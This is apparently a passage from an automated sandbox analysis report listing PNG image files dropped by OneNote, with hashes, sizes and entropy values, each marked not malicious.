                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
